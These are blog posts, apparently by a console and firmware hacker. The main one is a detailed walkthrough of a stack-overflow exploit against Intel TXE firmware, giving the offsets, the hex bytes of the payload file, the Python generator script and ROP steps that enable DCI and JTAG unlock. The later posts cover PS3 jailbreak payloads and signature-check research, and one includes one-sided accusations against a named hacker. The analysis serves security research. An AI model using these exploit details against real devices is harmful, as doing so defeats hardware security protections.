01bf:0000000000055e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055fb0: 00 00 00 00 00 00 00 00 1a 6e 01 00 98 5d 05 00 -- pop ESP 0x55c98
01bf:0000000000055fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ff0: 58 5a 05 00 0c 00 00 00 00 03 00 03 fc 5f 05 00

A couple of things first :

  • The stack is at offset 0x56000
  • The /home/bup/ct file gets read into offset 0x55C80

We can see the call to bup_read_mfs_file at 0x55b28, but the stack is corrupted all the way to 0x55BC0, meaning that all those functions above that line were called and already returned when the exploit happened. According to the assembly code, the TXE doesn’t read the file in chunks or copy it to shared memory, so by the time bup_dfs_read_file returns, no memcpy on shared memory was called and the exploit hasn’t run. The reason for that is that the file isn’t read into the stack then copied to a shared memory, instead, a shared memory block is created pointing to the stack, then reading the data gets it to the stack by using the sys_write_shared_mem function. So once the buffer overflow is done, the copy is also done.

If you’re wondering what I mean by bup_dfs_read_file and bup_read_mfs_file, here’s a little pseudo-code of how the TXE’s BUP module initializes itself from the entry point to the time the exploit runs (only relevant code is shown, and it’s over simplified). It shows the function calls that would appear in the stack, in the right order. If you want to follow along on IDA, it’s using TXE version 3.0.1.1107:

// sub_2604C
// The entry point. First code executed after the kernel launches the BUP process
void bup_entry() {
   // Initialize stack, tls, syslib, etc...
   // bup_init();
   // then call the main function
   bup_main();
}

// sub_35001
// The main function I assume which does most of everything
void bup_main() {
   // All sorts of initialization of stuff
   // function1(); function2();
   bup_run_init_scripts();
   // Some more stuff
   // function3(); function4();
}

// sub_355E0
// This runs 'scripts', it basically loops through an array of arrays
// containing functions and calls each of those functions.
// Each function will initialize one part of the hardware.
void bup_run_init_scripts() {
{
  // Simplification of what it does
  for (int i = 0; i < scripts.length; i++)
     scripts.function[i]();
}

// 0x4FDCC
// Simplification of the scripts array, it actually is an array of structures, 
// each with an id and two script arrays within each structure.
void *scripts = {
  bup_init_this,
  bup_init_that,
  bup_init_storage,
  bup_init_dci,
  bup_init_trace_hub,
  bup_init_other,
  // etc.. 94 total functions get called.
}

// sub_49842
// This initializes the trace hub functionality by reading the /home/bup/ct file. This is where the exploit happens.
void bup_init_trace_hub() {
   char ct_data[808];
   int file_size;
   int bytes_read;

   // again, simplification
   bup_dfs_get_file_size("/home/bup/ct", &file_size);
   bup_dfs_read_file("/home/bup/ct", 0, ct_data, file_size, &bytes_read);

   // Handle the content of the CT file
   // for () {}
   // bup_init_trace_hub_set_systracer();
   // Stack Guard
}

// sub_3123B
// This reads a file from storage
int bup_dfs_read_file(char *file_name, int offset, char *buffer, unsigned int read_size, unsigned int *out_bytes_read)
{
  // Complex function (250 lines) that ends up doing this, more or less :
  int shmem_blockid = create_shared_memory_block(sys_get_thread_id(), buffer, read_size);
  CFGRecord *file = get_cfg_file_record(file_name);
  bup_read_mfs_file(mfs_partition, file->offset + offset, shmem_blockid, read_size, out_bytes_read)
  release_shared_memory_block(shmem_blockid)
  // Stack Guard
}

// sub_297BA
// Read the MFS file content and copies it to shared memory
// the function is more complex than shown, its arguments as well, I've removed anything not important.
int bup_read_mfs_file(void *mfs_partition, int offset, int shmem_blockid, unsigned int read_size, unsigned int *out_bytes_read)
{
   *out_bytes_read = read_size;
   sys_write_shared_memory(shmem_blockid, mfs_partition + offset, read_size, read_size)
   // Stack Guard
}

// sub_AE87
// This is in the syslib module, not the BUP module.
int sys_write_shared_memory(int blockid, void *src, int src_size, int write_size)
{
   SHMem *block = get_shared_memory_block(blockid);
   memcpy(block->addr, src, write_size)
   // Stack Guard
}

So, technically, according to the BlackHat presentation, when bup_read_mfs_file gets called, it reads the MFS file in chunks, and when it calls sys_write_shared_memory, it will execute our exploit, but from the stack that I dumped and analyzed above, that’s not what happens, because I can see the stack corrupted (overwritten by subsequent calls) that proves that bup_read_mfs_file has returned before the exploit happens, and then reverse engineering the code, I also see that there is no reading in chunks, which explains why things are different than in the presentation. So the exploit has to happen between the call to bup_dfs_read_file and the end of the bup_init_trace_hub, because the security cookie (stack guard) is destroyed by the buffer overflow so we can’t let bup_init_trace_hub return.. If we look at what happens in bup_init_trace_hub after the call to bup_dfs_read_file, then we see this :

void bup_init_trace_hub() {
   char ct_data[808];
   int file_size;
   int bytes_read;

   // again, simplification
   bup_dfs_get_file_size("/home/bup/ct", &file_size)
   bup_dfs_read_file("/home/bup/ct", 0, ct_data, file_size, &bytes_read)

   CT *ct = (CT *)ct_data;
   for (uint16_6 i = 0; i < ct->num_entries; i++) {
       if (ct->entries[i].selector == 1)
          set_segment_word(7, ct->entries[i].offset, ct->entries[i].value)
       if (ct->entries[i].selector == 2)
          set_segment_word(0xBF, ct->entries[i].offset, ct->entries[i].value)
   }
   bup_init_trace_hub_set_systracer(7, 0xBF)
}

// sub_49AD3
// The following is a small function that gets called and sets flags on 
// the systracer context value and returns.
bup_init_trace_hub_set_systracer(unsigned int seg1, unsigned int seg2) 
{
   // sys_get_sys_tracer_ctx() returns syslib_context + 0x200
   char *systracer = sys_get_sys_tracer_ctx();

   // Set the DWORD at address systracer + 0x10 to the first argument
   *(uint32_t *)(systracer + 0x10) = seg1;

   // Set bits 0 and 1 of systracer to 1 and clear bits 6 and 7 
   systracer[0] |= 3;
   systracer[0] &= 0x3F;
   // set bit 6 of systracer to the same as bit 3 of 0xBF:10
   systracer[0] |= ((get_segment_word(seg2, 0x10) >> 3) & 1) << 6
   // set bit 7 of systracer to the same as bit 7 of 0xBF:10
   systracer[0] |= get_segment_word(seg2, 0x10) & 0x80
   // Clear bits 8 and 9 of systracer
   systracer[1] &= 0xFC;
   // set bit 8 of systracer to the same as bit 11 of 0xBF:10
   systracer[1] |= (get_segment_word(seg2, 0x10) >> 11) & 1 
   // set bit 9 of systracer to the same as bit 24 of 0xBF:E0
   systracer[1] |= ((get_segment_word(seg2, 0xE0) >> 24) & 1) << 1; 
}

The systracer context is at syslib_ctx + 0x200 and if we look again at what the exploit from PT does, it sets the the syslib_ctx to 0x55a58 so the modified data (systracer) is at 0x55c58 which happens to be the return address of the function bup_init_trace_hub_set_systracer itself. Here’s what the stack actually looks like if we follow all the push/pop/call/ret from the entrypoint to the moment the exploit happens :

TXE STACK - bup_entry:
 0x56000: STACK TOP
 0x55FEC: TLS

 0x55FE8: ecx - arg to bup_main
 0x55FE4: edx - arg
 0x55FE0: eax - arg
 0x55FDC: retaddr - call bup_main 
   0x55FD8: saved ebp of bup_entry

   0x55FD4: 0 - arg to bup_run_init_scripts
   0x55FD0: retaddr - call bup_run_init_scripts 
     0x55FCC: saved ebp of bup_main
     0x55FC8: saved edi
     0x55FC4: saved esi
     0x55FC0: saved ebx
     0x55FBC: var_10

     0x55FB8: retaddr - call bup_init_trace_hub
       0x55FB4: saved ebp of bup_run_init_scripts
       0x55FB0: saved esi
       0x55FAC: saved ebx
       0x55C64: STACK esp-0x348
         0x55FA8: security cookie
         0x55C80: ct_data
         0x55C6C: si_features
         0x55C68: file_size
         0x55C64: bytes_read

         0x55C60: 0xBF - arg to bup_init_trace_hub_set_systracer
         0x55C5C: 7 - arg
         0x55C58: retaddr - call bup_init_trace_hub_set_systracer
           0x55C54: saved ebp of bup_init_trace_hub
 

So you can see that the systracer value that gets modified is at 0x55c58 which according to the stack is the return address of bup_init_trace_hub_set_systracer, if we look at the dump of the stack from before, you can also see that the value at 0x55c68 is indeed 7 as expected (due to *(uint32_t *)(systracer + 0x10) = seg1;). If we can control the return value of our own function, then we control what we execute.

The only things that can be controlled of our return value though are bits 0, 1, 6, 7, 8 and 9. Bits 0 and 1 are always set to 1, bits 6, 7 and 8 are dependent on a value stored in segment 0xBF at offset 0x10, and bit 9 is dependent on a vale stored in segment 0xBF at offset 0xE0. Thankfully both those values in segment 0xBF can be set through the tracehub configuration file header (the loop at the end of bup_init_trace_hub).

The ct file header has this format :

struct {
   uint8_t ignore[6];
   uint16_t num_entries;
   struct {
      uint24_t offset; // offset in the segement is only 20 bits
      uint8_t segment_selector; // if value is 1, segment is 0x07, if value is 2, segment is 0xBF
      uint32_t value; // Value to set in segment_selector:offset
   }[num_entries];
};

With the ct file header being set by the exploit to :

00 00 00 00 00 00 02 00 e0 00 00 02 00 00 00 5f
10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00

We can see it has 2 entries, which sets 0xBF:E0 to 0x5F000000 and 0xBF:10 to 0x000888

With those values set, the bup_init_trace_hub_set_systracer function that gets called in bup_init_trace_hub will overwrite its own return address at offset 0x55C58 from 0x4995B to 0x49BDB which makes it jump in the middle of sub_49BB6 with the stack/ebp of bup_init_trace_hub, such that when that function returns, it will return to the address stored in the retaddr offset of bup_init_trace_hub which is 0x55FB8. Note that the function sub_49BB6 does not check the stack for the security cookie and the point where we jump into that function makes it call a few functions that just return with an error because their parameters are wrong, so it doesn’t seem to do anything.

That address 0x55FB8 that contains the retaddr is at position 0x338 in the ct file (0x56000 – 0x55FB8 = 0x48 bytes from the end of the file of size 0x380) which contains :
1a 6e 01 00 98 5c 05 00

The address 0x16e1a is in the middle of an actual instruction but it will itself be interpreted as the instruction pop esp followed by a ret. This pops the next value 0x55c98 into the stack pointer and returns to it. If you remember, I said the ct buffer is saved into 0x55C80 (which you can also see from the stack analysis above), so address 0x55C98 is at offset 0x18 in the CT file (which is right after the header and those 2 entries that set values in segment 0xBF) which is where we find the actual ROP gadgets which enable DCI, set red unlock then enter an infinite loop.

If we look back at the python script that generates the CT file for the exploit, we can now understand everything it does :

STACK_BASE = 0x00056000
BUFFER_OFFSET = 0x380
SYS_TRACER_CTX_OFFSET = 0x200
SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
RET_ADDR_OFFSET = 0x338


def GenerateTHConfig():
    print("[*] Generating fake tracehub configuration...")
    trace_hub_config   = struct.pack("<B", 0x0)*6
    trace_hub_config  += struct.pack("<H", 0x2)
    trace_hub_config  += struct.pack("<L", 0x020000e0)
    trace_hub_config  += struct.pack("<L", 0x5f000000)
    trace_hub_config  += struct.pack("<L", 0x02000010)
    trace_hub_config  += struct.pack("<L", 0x00000888)

def GenerateRops():
    print("[*] Generating rops...")
    # Let's ignore this for now

def GenerateShellCode():
    syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
    data  = GenerateTHConfig()
    init_trace_len = len(data)
    data += GenerateRops()
    data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data))
    data += struct.pack("<L", 0x00016e1a) 
    data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len)

    data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start,  0, 0x03000300, STACK_BASE-4)
    data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail))
    data += data_tail
    return data

The only remaining magic number is in that data_tail variable, which is the TLS structure. The 0x03000300 value is simply the thread ID.

Rops

The latest version of the exploit which adds CPU bring up will simply add the ROP gadgets needed to continue the bup initialization just as it would have, right after the bup_init_trace_hub returned (by resetting the syslib context to the right value then restoring the stack and registers then returning into the bup_run_scripts).

The ROPs are quite simple, they do two things : First, they enable the DCI interface, then they set the DfX Aggregator personality to 3 (which enabled RED Unlock for JTAG) then enter an infinite loop.

// Enable DCI
side_band_mapping(0x706a8, 0x100); 
put_sel_word(0x19F, 0, 0x1010); // Sets 0x19F:0 to 0x1010

// Set DfX-agg personality
side_band_mapping(0x70684, 0x100);
put_sel_word(0x19F, 0x8400, 3); // Sets 0x19F:8400 to 3

loop();

I wondered for a long time “what is that sideband mapping” and “what are those 0x706a8 and 0x70684 values”. I will explain these in the next blog post (in the next couple of days) but in summary, it causes segment 0x19F to be mapped to the DCI and DfX Aggregator devices’ Private Configuration Registers (PCRs). So first, you map segment 0x19F to the DCI device’s PCR, then you enable DCI by setting the flags to 1, then you map segment 0x19F to the DfX-agg device then set the personality register in its PCR at offset 0x8400 to 3 (red).

With just those two values set, you have DCI enabled and Red Unlock enabled, and the exploit is working. Congratulations, you can now play around with your CSE device via JTAG.

Conclusion

The CT file has 4 things :

  • Header: which sets the various values in segment 0xBF for the systracer to work
  • Big ROPs: which execute the custom code we want to enable DCI and RED unlock
  • Small ROPs: Smaller header at offset 0x338 which does a pop esp; ret to return us to the first bigger ROP
  • TLS: The modified TLS header which points the syslib context to 0x55A58 so the systracer offset points to the return address of the function that sets it.

The new TLS has a new syslib context which points the systracer offset to the return address of the bup_init_trace_hub_set_systracer function that modifies it using the values in the ct file header in order to jump to offset 0x49BDB in sub_49BB6 so that when that function returns, it will jump to the small ROP which will replace ESP with the address of the Big ROPs then execute them, which then enables DCI and JTAG and loops forever or continues the bup init process depending on the version of the exploit used.

Yeah.. that was a lot of fun to figure out. So you see that this exploit is not entirely the same as the skylake exploit. The skylake exploit is actually quite a lot more difficult to achieve because it involves more moving parts. I assume that’s the reason why PT hadn’t released that.

In the next post I write, I will explain how I ported this exploit to ME 11.x using the information provided by Positive Technologies and I will explain how to port your own ME version to it using what I wrote as a base.

Thanks for reading!

Status update on the PS3 4.0 HEN

Here’s a “quick” status update on the 4.00 HEN (Homebrew ENabler) for PS3.

Following my clarifications from almost 2 months ago here, there has been a lot of progress. We have not been slacking off, we’re a group of about 10 developers working together for the last 2 months, for sometimes 15 hours everyday in order to bring back homebrew support to the latest version of the PS3.

There are three major parts to the HEN, first, getting the packages to install on the PS3, that part is done, completed, tested, debugged, etc.. the second part is to get the apps to run, that one still has major issues… the last part is something I will not discuss for now (it’s a surprise) but it’s about 60% to 70% done (and it has nothing to do with peek&poke and has nothing to do with backup managers or anything like that. This is and will stay a piracy-free solution for the PS3).

Now, running apps is the biggest challenge that we’ve been working on for the past 2 months. As some of you know, if you’ve been following me on Twitter, we originally had hoped for Mathieulh to give us the “npdrm hash algorithm” that was necessary to run the apps, but he was reluctant, he kept doing his usual whore so people would kiss his feet (or something else) so he’d feel good about himself. But in the end, he said that he refuses to give us the needed “npdrm hash algorithm” to make it work… So what I initially thought would be “this will be released next week” ended up taking a lot more time than expected, and we’re still nowhere near ready to make it work.

Mathieulh kept tossing his usual “riddles” which he thinks are “very helpful for those who have a brain”, and which pisses off anyone who actually does… so he told us that the solution to all our problems was to look in appldr of the 3.56 firmware.. and that it was something lv1 was sending appldr which made the “hash check” verified or not… so we spent one month and a lot of sweat and after killing a few of our brain cells out of exhaustion, we finally concluded that it was all bullshit. After one month of reading assembly code and checking and double-checking our results, we finally were able to confirm that that hash algorithm was NOT in the 3.56 firmware like he told us (at all).

He said  that it was an AES OMAC hash, but after tracking all the uses of the OMAC functions in appldr, we found that it was not used for the “hash”…  he then said “oh, I meant HMAC“, so we do that again and again come up with the same conclusion, then we’re sure it’s not in appldr, and then he says “ah no, it’s in lv1“.. have a look for yourself to what he decided to write : http://www.ps3devwiki.com/index.php?title=Talk:KaKaRoTo_Kind_of_%C2%B4Jailbreak%C2%B4

That happened after the huge twitter fight I had with him for being his usual arrogant ass and claiming that he “shared” something (For your information, the code that he shared was not his own, I have proof of that too (can’t show you the proof because even if I don’t respect him, I gave him my word to not share what he gave me, and I respect my word) since he forgot to remove the name of the original developer from one of the files… also it was completely useless and was not used at all, just made me waste a day reading the crappy undocumented code. So why is he still trying to force his “advice” through these riddles even after we had that fight? Well to sabotage us and make us lose all those months of hard work!

So anyways, we had all accepted that Mathieulh was full of shit (we knew before, but we gave him the benefit of the doubt) and decided to continue working without considering any of his useless riddles. So we then tried to exploit/decrypt the 3.60+ firmware in order to get the algorithm from there.

Now, a few more weeks later, we finally have succeeded in fully understanding that missing piece from the “npdrm hash algorithm”,  and here it is for everyone’s pleasure with some prerequisite explanation :

A game on the PS3 is an executable file in a format called a “SELF“file (kind of like .exe on windows), those “self” files are cryptographically signed and encrypted.. For PSN games (games that do not run from a bluray disc), they need to have an additional security layer called “NPDRM”. So a “npdrm self” is basically an executable that is encrypted and signed, then re-encrypetd again with some additional information. On 3.55 and lower, we were able to encrypt and sign our own self files so they would look like original (made by sony) “npdrm self” files, and the PS3 would run them without problem. However, it wasn’t really like an original file.. a real NPDRM self file had some additional information that the PS3 simply ignored, it did not check for that information, so we could put anything in it, and it worked. Since the 3.60 version, the PS3 now also validates this additional information, so it can now differentiate between NPDRM self files created by sony and the ones that we create ourselves for homebrew. That’s the “npdrm hash algorithm” that we have been trying to figure out, because once we can duplicate that information in the proper manner, then the PS3 will again think that those files are authentic and will let us play them.

Another important point to explain, I said a few times that the files are “signed”.. this means that there is an “ECDSA signature” in the file which the PS3 can verify. The ECDSA signature is something that allows the PS3 to verify if the file has been modified or not.. it is easy to validate the signature, but impossible to create one without having access to the “private keys” (think of it like a real signature, you can see your dad’s signature and recognize it, but you can’t sign it exactly like him, and you can recognize if your brother tried to forge his signature). So how were we able to sign the self files that were properly authenticated on 3.55? That’s because this “ECDSA signature” is just a very complicated mathematical equation (my head still hurts trying to fully understand it, but I might blog about it in the future and try to explain it in simple terms if people are interested you can learn about it here), and one very important part of this mathematical equation is that you need to use a random number to generate the signature, but Sony had failed and used the same number every time.. by doing that, it was easy to just find the private key (which allows us to forge perfectly the signature) by doing some mathematical equation on it. So to summarize, a “signed file” is a file which is digitally signed with an “ECDSA signature” that cannot be forged, unless you have the “private key” for it, which is impossible to obtain usually, but we were able to obtain it because Sony failed in implementing it properly.

Now, back on topic.. so what is this missing “npdrm hash algorithm” that we need? well it turns out that the “npdrm self” has a second signature, so it’s a “encrypted and signed self file” with an additional layer of security (the NPDRM layer) which re-encrypts it and re-signs it again. That second signature was not verified in 3.55 and is now verified since the 3.60 version of the PS3 firmware.

One important thing to note is that Sony did NOT make the same mistake with this signature, they always used a random number, so it it technically impossible to figure out the private key for it. To be more exact, this is the exact same case as the .pkg packages you install on the PS3, you need to patch the firmware (making it cfw) so that those .pkg files can be installed, and that’s because the .pkg files are signed with an ECDSA signature for which no one was able to get the private key. That’s why we call them “pseudo-retail packages” or “unsigned packages”.

The signature on the NPDRM self file uses the exact same ECDSA curve and the same key as the one used in PS3 .pkg files, so no one has (or could have) the private key for it. What this means is that, even though we finally figured out the missing piece and we now know how the NPDRM self is built, we simply cannot duplicate it.

The reason we wasted 2 months on this is because Mathieulh lied by saying that he can do it.. remember when the 4.0 was out and I said “I can confirm that my method still works” then he also confirmed that his “npdrm hash algorithm” still works too? well he didn’t do anything to confirm, he just lied about it because there is no way that he could have verified it because he doesn’t have the private key.

I said I will provide proof of the lies that Mathieulh gave us, so here they are : he said it’s in 3.56, that was a lie, he said it’s an AES OMAC, that was a lie,  he said it’s an HMAC, that was a lie, he said it’s in appldr, that was a lie, he said it’s in lv1, that was a lie, he said that he can do it, that was a lie, he said that “it takes one hour to figure it out if you have a brain”, that was a lie, he said that he verified it to work on 4.0, that was a lie, he said that he had the algorithm/keys, that was a lie, he said that once we know the algorithm used, we can reproduce it, that was a lie, he kept referring to it as “the hash”, that was wrong. The proof ? It’s an ECDSA signature, it’s not a hash (two very different terms for different things), it was verified by vsh.self, it was not in lv2, or lv1, or appldr, and the private key is unaccessible, so there is no way he could build his own npdrm self files. Now you know the real reason why he refused to “share” what he had.. it’s because he didn’t have it…

So why do all this? was it because his arrogance didn’t allow him to admit not knowing something? or was it because he wanted to make us lose all this time? To me, it looks like pure sabotage, it was misleading information to steer us away from the real part of the code that holds the solution…. That is of course, if we are kind enough to assume that he knew what/where it was in the first place.  In the end, he wasn’t smart enough to only lie about things that we could not verify.. now we know (we always knew, but now we have proof to back it) that he’s a liar, and I do not think that anyone will believe his lies anymore.

 

Enough talking about liars and drama queens, back to the 4.0 HEN solution… so what next? well, we now know that we can’t sign the file, so we can’t run our apps on 3.60+ (it can work on 3.56 though). What we will do is look for a different way, a completely new exploit that would allow the files we install to actual run on the PS3. We will also be looking for possible “signature collisions” and for that we will need the help of the community, hopefully there is a collision (same random number used twice) which will allow us to calculate the private key, and if that happens, then we can move forward with a release.

When will the “jailbreak” be released? If I knew, I’d tell you, but I don’t know.. I would have said in last november, then december, then before christmas, then before new year, etc… but as you can see, it’s impossible to predict what we will find.. we might get lucky and have it ready in a couple of days, or we may not and it will not be ready for another couple of months.. so all you need to do is : BE PATIENT (and please stop asking me about an estimated release date)!

I would like to thank the team who helped on this task for all this time and who never got discouraged, and I’d like to thank an anonymous contributor who recently joined us and who was instrumental in figuring it all out. We all believe that freedom starts with knowledge, and that knowledge should be open and available to all, that is why we are sharing this information with the world. We got the confirmation (by finding the public key used and verifying the signatures) yesterday and since sharing this information will not help Sony in any way to block our efforts in a future release, we have decided to share it with you.  We believe in transparency, we believe in openness, we believe in a free world, and we want you to be part of it.

If you want to know more about this ECDSA signature algorithm, I tried to explain it in a blog post here, also, you can read this interesting paper that explains it in detail, and you can also watch Team Fail0verflow’s CCC presentation that first explained Sony’s mistake in their implementation, which made custom firmwares possible.

 

Thanks for reading,

KaKaRoTo

 

PS3: The payload mess…

Hi all,

I see a lot of people asking me some questions and I notice a lot of ignorance in the net about the different payload and the latest PL3 payload. So I want to make things clear..
First of all, people should stop talking/requesting/using the hermes v3 payload, I don’t like his work, and the payload is not good, it might crash the system in some cases, it’s not written properly, and hermes doesn’t even seem to understand how git works.
Also, PL3 already includes (for some time now) all the good stuff from hermes, it already supports installing game updates, or running games without a disc, anything else that Hermes added is useless and dangerous could crash in some situations (requiring a reboot).

Some might have seen my tweets about my new payload being released, and many are asking me what is the difference between my payload and what is already available.
PL3 doesn’t support syscall 36 anymore, for multiple reasons, first, it was bad code, it was mapping a path to a single hardcoded value (/dev_bdvd or /app_home or /dev_flash or whatever is hardcoded in the payload) which means that, since we (the PSGroove and PSFreedom developers) don’t want to support running backups, all the official payloads weren’t working with the backup manager without being patched first. The syscall 35 I added in my payload is more generic though, it is the proper way of doing things. You can map any path to another other new path, the prototype looks like this :

  syscall_35 (char *old_path, char *new_path);

This means that the payload doesn’t need to have a hardcoded /dev_bdvd path in it, or have extra code for mapping /app_home to something else.. or having syscall 36 change both /dev_bdvd and /app_home breaking homebrew when using a discless mode with a backup manager. You also don’t need a special payload to run the ‘firmware usb loader’.. It all just works because the choice of the path mapping is given to the homebrew applications themselves. This means that the backup managers will just map /dev_bdvd to what they want and they will work by default on my payload, there will be no need for a patched version of the payload to make them work.
This however means that the backup managers that depend on syscall 36 will stop working. For now Gaia Manager is the only backup manager available that is compatible with my payload. But I’m sure more will be ported to use syscall 35.
People need to understand that this new syscall 35 has to become the new standard, this is what all the payloads should use, nothing else, and this is what everyone should start using, not the old, crappy, backup-manager specific, PSJailbreak written, syscall 36.

We need to have some form of standardization for all these payloads, I’m tired of seeing about 100 different payloads floating on the internet, it doesn’t make sense. I always believed in a single payload that works for everyone, and that’s why I created PL3, that’s why it’s a project independent of PSFreedom (and PSGroove has been ported to it) and that’s where all the efforts should go. Also, by using PL3, you automatically gain support, and all the same features, for whatever previous firmwares PL3 already supports (3.01, 3.10, 3.15 and 3.41).

I have just recently seen this new payload that everyone is so happy about that includes “all the good things from 3 worlds”, the one created by Rancid, which includes the stuff from hermes, waninkoko and Mathieulh… and I was shocked to see how much people were happy about this.. people don’t really seem to understand that this wasn’t necessary at all? PL3 has had all those patches for a while now, so why did Rancid even bother making this payload that includes the patches from hermes, waninkoko and Mathieulh? Why would you spend your time doing something that already is available!

This blog post is meant to stop all this ignorance and let people know that they don’t need to look for a special payload, just use PL3 and you’ll get everything you need. It is also meant to explain to everyone what is different about my payload.

On a side, I have received a P3Hub device, kindly donated to me by the people from r4king.com, and I have now tried PSGroove for the first time! I’ve also created a fork of jevinskie’s port of PSGroove which is now improved and updated to support the latest PL3 version. This means that the PL3 payload is available for everyone, those using PSFreedom as well as those using PSGroove, so there is no excuse now on not using it or relying on badly written payloads developed by people who barely know how to code (yes, using winrar instead of git is a good indication of that).

Update: I forgot to rant about peek&poke!!! So let’s do it now… well, the default payload in PL3 has peek and poke disabled, and for a simple reason : Nobody needs them! and more importantly they are misued! I’ve look at the code of the different backup managers, and it looks like all of them use poke to patch the memory to ‘fix something’ because they think that it’s their job to do it.. no it’s not! If you have a working patch, then submit it to PL3 and if people complain, tell them “use the proper payload”, don’t try to take advantage of peek&poke to go and modify the kernel’s instructions! The reason is simple.. you are a homebrew app that does X, then do X, leave the kernel patching to the payloads! Just as PL3 doesn’t map /dev_bdvd to /dev_usb000/I.Like.This.Game/ and locks it out! Also, I’m on firmware 3.15, so when you decide to poke and patch the kernel with a hardcoded offset, you’re just screwing up my kernel because the offset is firmware dependent! it’s not the same depending on the firmware you use, and I don’t want you playing with it. So.. peek&poke are really not useful to anybody, they are not even available on a normal linux pc, so why would you want them in your default payload, right?! The only people who should use a payload with those syscalls enabled are real developers, people who want to analyze and patch the kernel on the fly while they are doing some development of, maybe, a kernel driver! That’s it. Anyways, that’s enough ranting from me for today!

P.s: In my branch of PSGroove, I wrote a script that build the .hex file for every supported device (from the README) for every supported firmware. You can find all the hex files here : PSGroove+PL3 hex files

Update: Thanks to evilsperm, I’ve updated the archive with hex files for these devices : Blackcat, Xplain, Olimex, UsbTinyMkII, Bentio and OpenKubus.
Update 2: Some people reported crashes with my payload when running backups with installed updates. I figured out the cause and fixed it now in git. The hex files above have also been updated

Thanks for reading.
KaKaRoTo

PSFreedom now supports firmware 3.01, 3.10 and 3.15

Hi,

I’ve got some great news for those of you who have not updated your PS3 firmware! I have just succeeded in adding Firmware 3.01 support into PSFreedom. I’ve pushed the latest code to github and you can now download the source and compile PSFreedom for 3.01.
For now, you will need to edit config.h and change the FIRMWARE_3_41 into FIRMWARE_3_01, then recompile. However, I will soon add support for dynamically choosing the target firmware version by simply doing a :
echo 3.01 > /proc/psfreedom/fw_version

I will soon add support for firmware 3.10 and 3.15, so be patient, and you will be rewarded. I would like to thank Klutsh as well as Philippe Hug who helped me achieve this port to 3.01.
The new payload changes are available in the PL3 github and any project/port that is also using PL3 should automatically gain support for the 3.01 firmware.
You will also be able to enjoy some new ‘tools’ in PL3 that will allow you to dump the LV2 kernel as well as the decrypted ELF files of the XMB and other configuration files it uses. The ethernet dumping is also now compatible with PS3 Slim models.

Update:
Philhug and I have worked together recently to make PL3 compatible with 3.15, and it is now done, working and ready for you to use. I have just pushed the latest changes to github, so just update both PSFreedom and PL3, and define FIRMWARE_3_15 in PSFreedom’s config.h and recompile. You will then be able to enjoy your unrestricted PS3 on 3.15 firmwares. Enjoy!

Update 2:
I have just added support for firmware 3.10 to PL3. You can get it by upgrading to the latest git version of PL3. There are however some changes in there that might break PSFreedom, so wait until I update PSFreedom tomorrow to be compatible with the latest PL3 changes!
I have also added a HOWTO file that explains the steps required to port PSFreedom to an exploitable firmware. Enjoy

I would like to thank, again, those who have donated. For the others, you can still donate, if you appreciate the work I’ve done.

Enjoy!
KaKaRoTo

PS3: Introducing PL3 and 3.01 firmware news

Hi,

I’ll announce two things, first, let’s talk about PL3.. PL3 is a new project I started in order to have a common repository of payloads that can be used by any ‘jailbreak’  implementation. I got tired of copying payloads from PSGroove, and I had some nice changes in mine that I thought the PSGroove project could benefit from, so I thought I’d create a single repository that both projects, PSFreedom and PSGroove (or any other similar projects) could use.

You can find it in github, so don’t hesitate to submodule it and use it.

Second important news… I’ve bought a new PS3 just for homebrew. Thanks to all who donated money so I can buy it (I didn’t get enough donations to pay for it, but enough to help me). I bought this PS3 used and it came with firmware 3.01! This is good and bad news : I can’t use PSFreedom to jailbreak it, so i’ve put on hold any improvements for it, however, it will allow me to actually port PSFreedom to older firmwares! My plan is to get the jailbreak working on 3.01, then move on to 3.10 and 3.15 (depending on how hard it is, i might skip 3.10).

Another good news is that after 4 days of  work, I was finally able to dump the LV2 memory from the 3.01 firmware, and now all that remains is to find the right offsets to patch, and port PSFreedom to 3.01, so all those who are still using this firmware version, you will soon be able to jailbreak it! Once I’m done with that, I’ll try to do the same with the 3.10/3.15 firmware versions!

